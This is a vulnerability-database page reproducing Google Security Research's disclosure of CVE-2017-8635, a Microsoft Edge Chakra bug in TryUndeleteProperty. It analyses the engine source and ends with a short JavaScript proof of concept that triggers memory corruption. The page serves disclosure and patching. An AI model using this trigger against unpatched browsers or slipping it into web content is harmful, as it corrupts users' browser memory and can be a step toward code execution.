Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Edge Chakra TryUndeleteProperty Incorrect Usage Exploit

🗓️ 17 Aug 2017 00:00:00Reported by Google Security ResearchType 
zdt
 zdt🔗 0day.today👁 29 Views

Microsoft Edge Chakra TryUndeleteProperty Incorrect Usage Exploit CVE-2017-863

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC		The vulnerability in the JavaScript engine of Microsoft Edge and Internet Explorer allows a hacker to execute arbitrary code.
25 Aug 201700:00
bdu_fstec
Circl		CVE-2017-8635
17 Aug 201700:00
circl
CNVD		Microsoft Windows Internet Explorer and Edge JavaScript Engine Remote Code Execution Vulnerability (CNVD-2017-20505)
9 Aug 201700:00
cnvd
Check Point Advisories		Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-8635)
28 Aug 201700:00
checkpoint_advisories
CVE		CVE-2017-8635
8 Aug 201721:00
cve
Cvelist		CVE-2017-8635
8 Aug 201721:00
cvelist
Microsoft KB		August 8, 2017—KB4034658 (OS Build 14393.1593)
8 Aug 201707:00
mskb
Microsoft KB		August 8, 2017—KB4034660 (OS Build 10586.1045)
8 Aug 201707:00
mskb
Microsoft KB		August 8, 2017—KB4034664 (Monthly Rollup)
8 Aug 201707:00
mskb
Microsoft KB		August 8, 2017—KB4034665 (Monthly Rollup)
8 Aug 201707:00
mskb
Rows per page
Microsoft Edge: Chakra: Incorrect usage of TryUndeleteProperty 

CVE-2017-8635


Chakra implemented the reuse of deleted properties of an unordered dictionary object with the following code.

bool SimpleDictionaryUnorderedTypeHandler::TryReuseDeletedPropertyIndex(
    DynamicObject *const object,
    TPropertyIndex *const propertyIndex)
{
    if(deletedPropertyIndex == PropertyIndexRanges<TPropertyIndex>::NoSlots)
    {
        return false;
    }

    *propertyIndex = deletedPropertyIndex;
    deletedPropertyIndex = static_cast<TPropertyIndex>(TaggedInt::ToInt32(object->GetSlot(deletedPropertyIndex)));
    return true;
}

bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty(
    DynamicObject *const object,
    const TPropertyIndex existingPropertyIndex,
    TPropertyIndex *const propertyIndex)
{
    ...

    if(!IsReusablePropertyIndex(existingPropertyIndex))
    {
        return false;
    }

    ...

    const bool reused = TryReuseDeletedPropertyIndex(object, propertyIndex);
    Assert(reused);

    ...
    return true;
}


BOOL SimpleDictionaryTypeHandlerBase<TPropertyIndex, TMapKey, IsNotExtensibleSupported>::SetPropertyFromDescriptor(DynamicObject* instance, PropertyId propertyId, TPropertyKey propertyKey, SimpleDictionaryPropertyDescriptor<TPropertyIndex>* descriptor, Var value, PropertyOperationFlags flags, PropertyValueInfo* info)
{
    ...
    if (descriptor->Attributes & PropertyDeleted)
    {
        ...
        if(isUnordered)
        {
            TPropertyIndex propertyIndex;
            if(AsUnordered()->TryUndeleteProperty(instance, descriptor->propertyIndex, &propertyIndex))
            {
                Assert(PropertyRecordStringHashComparer<TMapKey>::Equals(propertyMap->GetKeyAt(propertyIndex), propertyRecord));
                descriptor = propertyMap->GetReferenceAt(propertyIndex);
            }
        }

        if (IsNotExtensibleSupported)
        {
            bool isForce = (flags & PropertyOperation_Force) != 0;
            if (!isForce)
            {
                if (!this->VerifyIsExtensible(scriptContext, throwIfNotExtensible))
                {
                    return FALSE; <<------ (a)
                }
            }
        }
        ...
        descriptor->Attributes = PropertyDynamicTypeDefaults;
        ...
    }
    ...
}

"TryUndeleteProperty" is calling "TryReuseDeletedPropertyIndex" on the assumption that the return value of it is always true. But if the method exits at (a), "descriptor->Attributes" will remain with "PropertyDeleted" set, and therefore we can call "TryUndeleteProperty" again and again until "deletedPropertyIndex" becames "NoSlots" which makes "TryReuseDeletedPropertyIndex" return false.

In the debug build, the PoC hits the assertion "Assert(reused);". In the release build, "propertyIndex" remains uninitialized, this will cause a memory corruption.

PoC:
const kNumProperties = 100;

let o = {};
for (let i = 0; i < kNumProperties; ++i)
    o['a' + i] = i;

Object.preventExtensions(o);  // IsNotExtensibleSupported && !this->VerifyIsExtensible

for (let i = 0; i < kNumProperties; ++i)
    delete o['a' + i];

for (let i = 0; i < 0x1000; ++i)
    o['a0'] = 1;  // calling TryUndeleteProperty again again




This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 2017 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.57966
microsoft edgechakratryundeletepropertyincorrect usageexploitcve-2017-8635memory corruption0day today
29